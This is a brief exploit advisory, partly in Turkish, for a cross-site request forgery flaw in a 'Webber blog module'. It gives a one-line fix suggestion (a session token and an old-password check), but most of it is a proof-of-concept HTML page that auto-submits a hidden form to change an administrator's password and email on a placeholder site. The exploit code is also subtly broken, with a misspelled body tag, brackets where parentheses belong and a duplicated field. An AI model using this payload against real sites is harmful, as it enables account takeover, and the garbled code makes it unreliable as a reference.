< ------------------- header data start ------------------- >
#############################################################
# Application Name : Webber blog module
# Vulnerable Type : XSRF
# Infection : Uzaktan otomatik olarak admin pass change edilebilir.
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.
# author : Bug Researchers/BizaRRo
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>
<form action=http://www.SITE.com/[PATCH]/index.php/members/do_update_profile method=post class=appnitro>
<input type=hidden name=_submit_check value=1 />
<input name=password type=hidden class=element text size=45 id=password value=addadd />
<input name=password type=hidden class=element text size=45 id=password value=addadd />
<input name=email type=hidden class=element text size=45 id=email value=[email protected] />
<input type=submit value=create name=B1>
< -- bug code end of -- >